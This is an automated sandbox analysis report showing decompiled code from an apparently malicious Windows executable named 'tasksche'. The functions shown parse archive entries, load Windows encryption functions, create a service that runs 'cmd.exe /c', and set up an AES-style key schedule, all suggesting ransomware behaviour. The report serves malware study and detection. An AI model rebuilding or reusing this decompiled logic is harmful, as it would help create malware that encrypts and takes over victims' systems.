                                                          													 *(_t281 + 0x108) = 0;
                                                          													if(_t156 != 0) {
                                                          														 *(_t281 + 0x108) = 0x10;
                                                          													}
                                                          													if(_t210 != 0) {
                                                          														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000020;
                                                          													}
                                                          													if(_a11 != 0) {
                                                          														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000002;
                                                          													}
                                                          													if(_t230 != 0) {
                                                          														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000001;
                                                          													}
                                                          													if(_v5 != 0) {
                                                          														 *(_t281 + 0x108) =  *(_t281 + 0x108) | 0x00000004;
                                                          													}
                                                          													 *((intOrPtr*)(_t281 + 0x124)) = _v100;
                                                          													 *((intOrPtr*)(_t281 + 0x128)) = _v96;
                                                          													_v40.dwLowDateTime = E00406B23(_v108 >> 0x10, _v108);
                                                          													_v40.dwHighDateTime = _t264;
                                                          													LocalFileTimeToFileTime( &_v40,  &_v32);
                                                          													_t173 = _v32.dwLowDateTime;
                                                          													_t234 = _v32.dwHighDateTime;
                                                          													_t212 = _v12;
                                                          													 *(_t281 + 0x10c) = _t173;
                                                          													 *(_t281 + 0x114) = _t173;
                                                          													 *(_t281 + 0x11c) = _t173;
                                                          													 *(_t281 + 0x110) = _t234;
                                                          													 *(_t281 + 0x118) = _t234;
                                                          													 *(_t281 + 0x120) = _t234;
                                                          													if(_v16 <= 4) {
                                                          														L57:
                                                          														if(_t212 != 0) {
                                                          															_push(_t212);
                                                          															L004076E8();
                                                          														}
                                                          														_t282 = _v24;
                                                          														memcpy(_t282 + 8, _t281, 0x12c);
                                                          														 *((intOrPtr*)(_t282 + 0x134)) = _a4;
                                                          														goto L60;
                                                          													} else {
                                                          														while(1) {
                                                          															_v12 =  *((intOrPtr*)(_t277 + _t212));
                                                          															_v10 = _v10 & 0x00000000;
                                                          															_v11 =  *((intOrPtr*)(_t212 + _t277 + 1));
                                                          															_a8 =  *(_t212 + _t277 + 2) & 0x000000ff;
                                                          															if(strcmp( &_v12, "UT") == 0) {
                                                          																break;
                                                          															}
                                                          															_t277 = _t277 + _a8 + 4;
                                                          															if(_t277 + 4 < _v16) {
                                                          																continue;
                                                          															}
                                                          															goto L57;
                                                          														}
                                                          														_t238 =  *(_t277 + _t212 + 4) & 0x000000ff;
                                                          														_t185 = _t238 >> 0x00000001 & 0x00000001;
                                                          														_t278 = _t277 + 5;
                                                          														_a11 = _t185;
                                                          														_v5 = _t238 >> 0x00000002 & 0x00000001;
                                                          														if((_t238 & 0x00000001) != 0) {
                                                          															_t271 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                          															_t194 = _t278 + _t212;
                                                          															_t278 = _t278 + 4;
                                                          															 *(_t281 + 0x11c) = E00406B02(_t271,  *_t194 & 0x000000ff | (0 << 0x00000008 | _t271) << 0x00000008);
                                                          															_t185 = _a11;
                                                          															 *(_t281 + 0x120) = _t271;
                                                          														}
                                                          														if(_t185 != 0) {
                                                          															_t270 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                          															_t190 = _t278 + _t212;
                                                          															_t278 = _t278 + 4;
                                                          															 *(_t281 + 0x10c) = E00406B02(_t270,  *_t190 & 0x000000ff | (0 << 0x00000008 | _t270) << 0x00000008);
                                                          															 *(_t281 + 0x110) = _t270;
                                                          														}
                                                          														if(_v5 != 0) {
                                                          															_t269 =  *(_t278 + _t212 + 1) & 0x000000ff;
                                                          															 *(_t281 + 0x114) = E00406B02(_t269,  *(_t278 + _t212) & 0x000000ff | (0 << 0x00000008 | _t269) << 0x00000008);
                                                          															 *(_t281 + 0x118) = _t269;
                                                          														}
                                                          														goto L57;
                                                          													}
                                                          												}
                                                          												goto L31;
                                                          											}
                                                          										}
                                                          										_t274 =  &(_t274[2]);
                                                          										goto L21;
                                                          									}
                                                          									_push(_v12);
                                                          									L004076E8();
                                                          									goto L19;
                                                          								}
                                                          								return 0x700;
                                                          							}
                                                          							E00406520(_t133);
                                                          							L11:
                                                          							_pop(_t213);
                                                          							goto L12;
                                                          						}
                                                          						E004064E2(_t213, _t132);
                                                          						goto L11;
                                                          					}
                                                          					goto L8;
                                                          				} else {
                                                          					if(_t272 == _t208) {
                                                          						L8:
                                                          						_t204 = _a8;
                                                          						 *_t204 =  *((intOrPtr*)( *_t280 + 4));
                                                          						 *((char*)(_t204 + 4)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x108)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x10c)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x110)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x114)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x118)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x11c)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x120)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x124)) = 0;
                                                          						 *((intOrPtr*)(_t204 + 0x128)) = 0;
                                                          						L60:
                                                          						return 0;
                                                          					}
                                                          					memcpy(_a8, _t280 + 8, 0x12c);
                                                          					goto L60;
                                                          				}
                                                          			}


















































                                                          0x00406c40
                                                          0x00406c40
                                                          0x00406c4c
                                                          0x00406c4f
                                                          0x00406c52
                                                          0x00406c56
                                                          0x00406c59
                                                          0x00407064
                                                          0x00000000
                                                          0x00407064
                                                          0x00406c5f
                                                          0x00406c64
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c6d
                                                          0x00406c70
                                                          0x00406c75
                                                          0x00406c75
                                                          0x00406c7c
                                                          0x00406c7f
                                                          0x00406ca0
                                                          0x00406cec
                                                          0x00406cf1
                                                          0x00406cfa
                                                          0x00406cfa
                                                          0x00406cff
                                                          0x00406d21
                                                          0x00406d3e
                                                          0x00406d52
                                                          0x00406d5c
                                                          0x00406d89
                                                          0x00000000
                                                          0x00406d89
                                                          0x00406d5e
                                                          0x00406d61
                                                          0x00406d68
                                                          0x00406d7e
                                                          0x00406d95
                                                          0x00406d9b
                                                          0x00406dab
                                                          0x00406db0
                                                          0x00406db8
                                                          0x00406dbe
                                                          0x00406dbe
                                                          0x00406dbe
                                                          0x00406dc2
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dd0
                                                          0x00406dd6
                                                          0x00000000
                                                          0x00406dd9
                                                          0x00406ddf
                                                          0x00406de5
                                                          0x00406e11
                                                          0x00406e11
                                                          0x00406e11
                                                          0x00000000
                                                          0x00406e11
                                                          0x00406ded
                                                          0x00406df3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406dfb
                                                          0x00406e01
                                                          0x00000000
                                                          0x00000000
                                                          0x00406e09
                                                          0x00406e0f
                                                          0x00406e1b
                                                          0x00406e20
                                                          0x00406e28
                                                          0x00406e2c
                                                          0x00406e3c
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e46
                                                          0x00406e61
                                                          0x00406e6b
                                                          0x00406e6d
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7c
                                                          0x00406e7c
                                                          0x00406e7e
                                                          0x00406e82
                                                          0x00406e88
                                                          0x00406e8a
                                                          0x00406e8a
                                                          0x00406e96
                                                          0x00406e98
                                                          0x00406e98
                                                          0x00406ea3
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406eae
                                                          0x00406eb0
                                                          0x00406eb0
                                                          0x00406ebb
                                                          0x00406ebd
                                                          0x00406ebd
                                                          0x00406eca
                                                          0x00406ed3
                                                          0x00406ee6
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406efb
                                                          0x00406efe
                                                          0x00406f05
                                                          0x00406f08
                                                          0x00406f0e
                                                          0x00406f14
                                                          0x00406f1a
                                                          0x00406f20
                                                          0x00406f26
                                                          0x00406f2c
                                                          0x00407037
                                                          0x00407039
                                                          0x0040703b
                                                          0x0040703c
                                                          0x00407041
                                                          0x00407048
                                                          0x0040704f
                                                          0x0040705a
                                                          0x00000000
                                                          0x00406f32
                                                          0x00406f32
                                                          0x00406f3a
                                                          0x00406f41
                                                          0x00406f45
                                                          0x00406f4d
                                                          0x00406f5d
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f62
                                                          0x00406f6c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f6e
                                                          0x00406f73
                                                          0x00406f81
                                                          0x00406f86
                                                          0x00406f89
                                                          0x00406f8f
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f99
                                                          0x00406f9e
                                                          0x00406fba
                                                          0x00406fc0
                                                          0x00406fc4
                                                          0x00406fc4
                                                          0x00406fcc
                                                          0x00406fce
                                                          0x00406fd3
                                                          0x00406fd8
                                                          0x00406ff4
                                                          0x00406ffb
                                                          0x00406ffb
                                                          0x00407005
                                                          0x00407007
                                                          0x0040702a
                                                          0x00407031
                                                          0x00407031
                                                          0x00000000
                                                          0x00407005
                                                          0x00406f2c
                                                          0x00000000
                                                          0x00406e0f
                                                          0x00406dd0
                                                          0x00406dcb
                                                          0x00000000
                                                          0x00406dcb
                                                          0x00406d80
                                                          0x00406d83
                                                          0x00000000
                                                          0x00406d88
                                                          0x00000000
                                                          0x00406d40
                                                          0x00406d02
                                                          0x00406cf9
                                                          0x00406cf9
                                                          0x00000000
                                                          0x00406cf9
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c83
                                                          0x00406ca2
                                                          0x00406ca7
                                                          0x00406caa
                                                          0x00406cae
                                                          0x00406cb1
                                                          0x00406cb7
                                                          0x00406cbd
                                                          0x00406cc3
                                                          0x00406cc9
                                                          0x00406ccf
                                                          0x00406cd5
                                                          0x00406cdb
                                                          0x00406ce1
                                                          0x00407060
                                                          0x00000000
                                                          0x00407060
                                                          0x00406c91
                                                          0x00000000
                                                          0x00406c96

                                                          APIs
                                                          • memcpy.MSVCRT(?,?,0000012C,?), ref: 00406C91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: /../$/..\$\../$\..\
                                                          • API String ID: 3510742995-3885502717
                                                          • Opcode ID: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                          • Instruction ID: 8d35de4500b3f4065ad8a7d009fa2f60231b6be20ed9f01f65d9d1a3966dd706
                                                          • Opcode Fuzzy Hash: 24419fe79de55b9e050378da4d3ae0875fe08eefc49193e89ac78033597620dd
                                                          • Instruction Fuzzy Hash: 98D147729082459FDB15CF68C881AEABBF4EF05300F15857FE49AB7381C738A915CB98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00401A45() {
                                                          				void* _t1;
                                                          				_Unknown_base(*)()* _t9;
                                                          				struct HINSTANCE__* _t11;
                                                          				intOrPtr _t15;
                                                          				intOrPtr _t17;
                                                          				intOrPtr _t18;
                                                          				intOrPtr _t19;
                                                          				intOrPtr _t20;
                                                          				intOrPtr _t21;
                                                          
                                                          				_t15 =  *0x40f894; // 0x0
                                                          				if(_t15 != 0) {
                                                          					L8:
                                                          					_t1 = 1;
                                                          					return _t1;
                                                          				}
                                                          				_t11 = LoadLibraryA("advapi32.dll");
                                                          				if(_t11 == 0) {
                                                          					L9:
                                                          					return 0;
                                                          				}
                                                          				 *0x40f894 = GetProcAddress(_t11, "CryptAcquireContextA");
                                                          				 *0x40f898 = GetProcAddress(_t11, "CryptImportKey");
                                                          				 *0x40f89c = GetProcAddress(_t11, "CryptDestroyKey");
                                                          				 *0x40f8a0 = GetProcAddress(_t11, "CryptEncrypt");
                                                          				 *0x40f8a4 = GetProcAddress(_t11, "CryptDecrypt");
                                                          				_t9 = GetProcAddress(_t11, "CryptGenKey");
                                                          				_t17 =  *0x40f894; // 0x0
                                                          				 *0x40f8a8 = _t9;
                                                          				if(_t17 == 0) {
                                                          					goto L9;
                                                          				}
                                                          				_t18 =  *0x40f898; // 0x0
                                                          				if(_t18 == 0) {
                                                          					goto L9;
                                                          				}
                                                          				_t19 =  *0x40f89c; // 0x0
                                                          				if(_t19 == 0) {
                                                          					goto L9;
                                                          				}
                                                          				_t20 =  *0x40f8a0; // 0x0
                                                          				if(_t20 == 0) {
                                                          					goto L9;
                                                          				}
                                                          				_t21 =  *0x40f8a4; // 0x0
                                                          				if(_t21 == 0 || _t9 == 0) {
                                                          					goto L9;
                                                          				} else {
                                                          					goto L8;
                                                          				}
                                                          			}












                                                          0x00401a48
                                                          0x00401a4f
                                                          0x00401aec
                                                          0x00401aee
                                                          0x00000000
                                                          0x00401aee
                                                          0x00401a60
                                                          0x00401a64
                                                          0x00401af1
                                                          0x00000000
                                                          0x00401af1
                                                          0x00401a7f
                                                          0x00401a8c
                                                          0x00401a99
                                                          0x00401aa6
                                                          0x00401ab3
                                                          0x00401ab8
                                                          0x00401aba
                                                          0x00401ac0
                                                          0x00401ac6
                                                          0x00000000
                                                          0x00000000
                                                          0x00401ac8
                                                          0x00401ace
                                                          0x00000000
                                                          0x00000000
                                                          0x00401ad0
                                                          0x00401ad6
                                                          0x00000000
                                                          0x00000000
                                                          0x00401ad8
                                                          0x00401ade
                                                          0x00000000
                                                          0x00000000
                                                          0x00401ae0
                                                          0x00401ae6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                                                          • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                                                          • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                                                          • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                                                          • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                                                          • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                          • API String ID: 2238633743-2459060434
                                                          • Opcode ID: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                          • Instruction ID: 9aae3444cc52ced5e7e1ad1d2a06d11cf911cb2b3a933a05a08c6ba10b936042
                                                          • Opcode Fuzzy Hash: b9d8274d123a30a539352919ce36730ce9328d7041a45cd95e79278e35d60e58
                                                          • Instruction Fuzzy Hash: 20011E32A86311EBDB30AFA5AE856677AE4EA41750368843FB104B2DB1D7F81448DE5C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00401CE8(intOrPtr _a4) {
                                                          				void* _v8;
                                                          				int _v12;
                                                          				void* _v16;
                                                          				char _v1040;
                                                          				void* _t12;
                                                          				void* _t13;
                                                          				void* _t31;
                                                          				int _t32;
                                                          
                                                          				_v12 = 0;
                                                          				_t12 = OpenSCManagerA(0, 0, 0xf003f);
                                                          				_v8 = _t12;
                                                          				if(_t12 != 0) {
                                                          					_t13 = OpenServiceA(_t12, 0x40f8ac, 0xf01ff);
                                                          					_v16 = _t13;
                                                          					if(_t13 == 0) {
                                                          						sprintf( &_v1040, "cmd.exe /c \"%s\"", _a4);
                                                          						_t31 = CreateServiceA(_v8, 0x40f8ac, 0x40f8ac, 0xf01ff, 0x10, 2, 1,  &_v1040, 0, 0, 0, 0, 0);
                                                          						if(_t31 != 0) {
                                                          							StartServiceA(_t31, 0, 0);
                                                          							CloseServiceHandle(_t31);
                                                          							_v12 = 1;
                                                          						}
                                                          						_t32 = _v12;
                                                          					} else {
                                                          						StartServiceA(_t13, 0, 0);
                                                          						CloseServiceHandle(_v16);
                                                          						_t32 = 1;
                                                          					}
                                                          					CloseServiceHandle(_v8);
                                                          					return _t32;
                                                          				}
                                                          				return 0;
                                                          			}











                                                          0x00401cfb
                                                          0x00401cfe
                                                          0x00401d06
                                                          0x00401d09
                                                          0x00401d21
                                                          0x00401d29
                                                          0x00401d2c
                                                          0x00401d54
                                                          0x00401d7b
                                                          0x00401d7f
                                                          0x00401d84
                                                          0x00401d8b
                                                          0x00401d91
                                                          0x00401d91
                                                          0x00401d98
                                                          0x00401d2e
                                                          0x00401d31
                                                          0x00401d3a
                                                          0x00401d42
                                                          0x00401d42
                                                          0x00401d9e
                                                          0x00000000
                                                          0x00401da7
                                                          0x00000000

                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00401CFE
                                                          • OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
                                                          • CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
                                                          • CloseServiceHandle.ADVAPI32(?), ref: 00401D9E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandleOpen$ManagerStart
                                                          • String ID: cmd.exe /c "%s"
                                                          • API String ID: 1485051382-955883872
                                                          • Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                          • Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
                                                          • Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
                                                          • Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				char _v24;
                                                          				int _t193;
                                                          				signed int _t198;
                                                          				int _t199;
                                                          				intOrPtr _t200;
                                                          				signed int* _t205;
                                                          				signed char* _t206;
                                                          				signed int _t208;
                                                          				signed int _t210;
                                                          				signed int* _t216;
                                                          				signed int _t217;
                                                          				signed int* _t220;
                                                          				signed int* _t229;
                                                          				void* _t252;
                                                          				void* _t280;
                                                          				void* _t281;
                                                          				signed int _t283;
                                                          				signed int _t289;
                                                          				signed int _t290;
                                                          				signed char* _t291;
                                                          				signed int _t292;
                                                          				void* _t303;
                                                          				void* _t313;
                                                          				intOrPtr* _t314;
                                                          				void* _t315;
                                                          				intOrPtr* _t316;
                                                          				signed char* _t317;
                                                          				signed char* _t319;
                                                          				signed int _t320;
                                                          				signed int _t322;
                                                          				void* _t326;
                                                          				void* _t327;
                                                          				signed int _t329;
                                                          				signed int _t337;
                                                          				intOrPtr _t338;
                                                          				signed int _t340;
                                                          				intOrPtr _t341;
                                                          				void* _t342;
                                                          				signed int _t345;
                                                          				signed int* _t346;
                                                          				signed int _t347;
                                                          				void* _t352;
                                                          				void* _t353;
                                                          				void* _t354;
                                                          
                                                          				_t352 = __ecx;
                                                          				if(_a4 == 0) {
                                                          					_a8 = 0x40f57c;
                                                          					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                          					_push(0x40d570);
                                                          					_push( &_v24);
                                                          					L0040776E();
                                                          				}
                                                          				_t283 = _a12;
                                                          				_t252 = 0x18;
                                                          				_t342 = 0x10;
                                                          				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
                                                          					_t283 =  &_v24;
                                                          					_a8 = 0x40f57c;
                                                          					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                          					_push(0x40d570);
                                                          					_push( &_v24);
                                                          					L0040776E();
                                                          				}
                                                          				_t193 = _a16;
                                                          				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
                                                          					_t283 =  &_v24;
                                                          					_a8 = 0x40f57c;
                                                          					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
                                                          					_t193 =  &_v24;
                                                          					_push(0x40d570);
                                                          					_push(_t193);
                                                          					L0040776E();
                                                          				}
                                                          				 *(_t352 + 0x3cc) = _t193;
                                                          				 *(_t352 + 0x3c8) = _t283;
                                                          				memcpy(_t352 + 0x3d0, _a8, _t193);
                                                          				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
                                                          				_t198 =  *(_t352 + 0x3c8);
                                                          				_t354 = _t353 + 0x18;
                                                          				if(_t198 == _t342) {
                                                          					_t199 =  *(_t352 + 0x3cc);
                                                          					if(_t199 != _t342) {
                                                          						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
                                                          					} else {
                                                          						_t200 = 0xa;
                                                          					}
                                                          					goto L17;
                                                          				} else {
                                                          					if(_t198 == _t252) {
                                                          						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
                                                          						L17:
                                                          						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
                                                          						L18:
                                                          						asm("cdq");
                                                          						_t289 = 4;
                                                          						_t326 = 0;
                                                          						_a12 =  *(_t352 + 0x3cc) / _t289;
                                                          						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                                                          							L23:
                                                          							_t327 = 0;
                                                          							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
                                                          								L28:
                                                          								asm("cdq");
                                                          								_t290 = 4;
                                                          								_t291 = _a4;
                                                          								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
                                                          								_v12 = _t345;
                                                          								_t329 =  *(_t352 + 0x3c8) / _t290;
                                                          								_t205 = _t352 + 0x414;
                                                          								_v8 = _t329;
                                                          								if(_t329 <= 0) {
                                                          									L31:
                                                          									_a8 = _a8 & 0x00000000;
                                                          									if(_t329 <= 0) {
                                                          										L35:
                                                          										if(_a8 >= _t345) {
                                                          											L51:
                                                          											_t206 = 1;
                                                          											_a16 = _t206;
                                                          											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
                                                          												L57:
                                                          												 *((char*)(_t352 + 4)) = 1;
                                                          												return _t206;
                                                          											}
                                                          											_a8 = _t352 + 0x208;
                                                          											do {
                                                          												_t292 = _a12;
                                                          												if(_t292 <= 0) {
                                                          													goto L56;
                                                          												}
                                                          												_t346 = _a8;
                                                          												do {
                                                          													_t208 =  *_t346;
                                                          													_a4 = _t208;
                                                          													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
                                                          													_t346 =  &(_t346[1]);
                                                          													_t292 = _t292 - 1;
                                                          												} while (_t292 != 0);
                                                          												L56:
                                                          												_a16 =  &(_a16[1]);
                                                          												_a8 = _a8 + 0x20;
                                                          												_t206 = _a16;
                                                          											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
                                                          											goto L57;
                                                          										}
                                                          										_a16 = 0x40bbfc;
                                                          										do {
                                                          											_t210 =  *(_t352 + 0x410 + _t329 * 4);
                                                          											_a4 = _t210;
                                                          											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
                                                          											_a16 = _a16 + 1;
                                                          											if(_t329 == 8) {
                                                          												_t216 = _t352 + 0x418;
                                                          												_t303 = 3;
                                                          												do {
                                                          													 *_t216 =  *_t216 ^  *(_t216 - 4);
                                                          													_t216 =  &(_t216[1]);
                                                          													_t303 = _t303 - 1;
                                                          												} while (_t303 != 0);
                                                          												_t217 =  *(_t352 + 0x420);
                                                          												_a4 = _t217;
                                                          												_t220 = _t352 + 0x428;
                                                          												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
                                                          												_t313 = 3;
                                                          												do {
                                                          													 *_t220 =  *_t220 ^  *(_t220 - 4);
                                                          													_t220 =  &(_t220[1]);
                                                          													_t313 = _t313 - 1;
                                                          												} while (_t313 != 0);
                                                          												L46:
                                                          												_a4 = _a4 & 0x00000000;
                                                          												if(_t329 <= 0) {
                                                          													goto L50;
                                                          												}
                                                          												_t314 = _t352 + 0x414;
                                                          												while(_a8 < _t345) {
                                                          													asm("cdq");
                                                          													_t347 = _a8 / _a12;
                                                          													asm("cdq");
                                                          													_t337 = _a8 % _a12;
                                                          													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
                                                          													_a4 = _a4 + 1;
                                                          													_t345 = _v12;
                                                          													_t338 =  *_t314;
                                                          													_t314 = _t314 + 4;
                                                          													_a8 = _a8 + 1;
                                                          													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
                                                          													_t329 = _v8;
                                                          													if(_a4 < _t329) {
                                                          														continue;
                                                          													}
                                                          													goto L50;
                                                          												}
                                                          												goto L51;
                                                          											}
                                                          											if(_t329 <= 1) {
                                                          												goto L46;
                                                          											}
                                                          											_t229 = _t352 + 0x418;
                                                          											_t315 = _t329 - 1;
                                                          											do {
                                                          												 *_t229 =  *_t229 ^  *(_t229 - 4);
                                                          												_t229 =  &(_t229[1]);
                                                          												_t315 = _t315 - 1;
                                                          											} while (_t315 != 0);
                                                          											goto L46;
                                                          											L50:
                                                          										} while (_a8 < _t345);
                                                          										goto L51;
                                                          									}
                                                          									_t316 = _t352 + 0x414;
                                                          									while(_a8 < _t345) {
                                                          										asm("cdq");
                                                          										_a4 = _a8 / _a12;
                                                          										asm("cdq");
                                                          										_t340 = _a8 % _a12;
                                                          										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
                                                          										_a8 = _a8 + 1;
                                                          										_t341 =  *_t316;
                                                          										_t316 = _t316 + 4;
                                                          										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
                                                          										_t329 = _v8;
                                                          										if(_a8 < _t329) {
                                                          											continue;
                                                          										}
                                                          										goto L35;
                                                          									}
                                                          									goto L51;
                                                          								}
                                                          								_a8 = _t329;
                                                          								do {
                                                          									_t317 =  &(_t291[1]);
                                                          									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
                                                          									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
                                                          									_t319 =  &(_t317[2]);
                                                          									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
                                                          									_t291 =  &(_t319[1]);
                                                          									_t205 =  &(_t205[1]);
                                                          									_t60 =  &_a8;
                                                          									 *_t60 = _a8 - 1;
                                                          								} while ( *_t60 != 0);
                                                          								goto L31;
                                                          							}
                                                          							_t280 = _t352 + 0x1e8;
                                                          							do {
                                                          								_t320 = _a12;
                                                          								if(_t320 > 0) {
                                                          									memset(_t280, 0, _t320 << 2);
                                                          									_t354 = _t354 + 0xc;
                                                          								}
                                                          								_t327 = _t327 + 1;
                                                          								_t280 = _t280 + 0x20;
                                                          							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
                                                          							goto L28;
                                                          						}
                                                          						_t281 = _t352 + 8;
